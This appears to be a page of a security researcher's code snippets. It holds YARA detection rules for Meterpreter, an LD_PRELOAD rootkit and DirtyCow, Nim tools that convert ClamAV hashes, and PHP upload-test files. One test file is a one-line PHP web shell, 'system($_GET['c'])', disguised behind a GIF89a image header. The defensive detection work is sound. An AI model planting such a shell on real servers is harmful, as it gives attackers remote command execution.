This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```php
dmknght<?php phpinfo();?>
```
```php
GIF89a <?php system($_GET['c']);?>
```
```php
GIF89a <?php phpinfo();?>
```
```
GIF89a hehe đang làm exam nè
```
```nim
import streams
import bitops
import strutils
import std/enumutils

const
  db_name = "mpavbase.vdm.extracted"

type
```
```nim
# Compile: nim c --opt:speed clam_hashes_to_yara.nim
import strutils

const
  clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb"
  yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara"

type
  HashSig = object
```
```yara
rule elf64_meterpreter_revtcp_raw {
  meta:
    description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders"
  strings:
    $ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05}
  condition:
    all of them
}
```
```yara
import "elf"
/*
  When a system is infected by this rootkit,
  all processes load the malicious library (LD_PRELOAD).
  It is possible to detect it via strings; however,
  the current Yara version doesn't load the ELF header
  of the mapped file.
*/
```
```yara
import "elf"
/*
  ANALYSIS
  The example is a compiled DirtyCow exploit.
  The binary imports several distinctive functions: getpass, getpid, madvise, pthread_create, pthread_join, ptrace, waitpid
  Location: section ".dynstr", size 0xfa, Yara type "elf.SHT_STRTAB"
  The ELF module of the current Yara version (4.2.0) has no built-in function to check for multiple imported functions in a binary.
  This rule file shows an easy way to do it.
*/
```
```python
"""
Code parser with tree-sitter
`sudo pip3 install tree_sitter`
Clone the parser for each programming language (same dir as this .py file): `git clone https://github.com/tree-sitter/tree-sitter-python`
Create test code like eval(base64.decode(<base64_text>))
"""
from tree_sitter import Language, Parser
```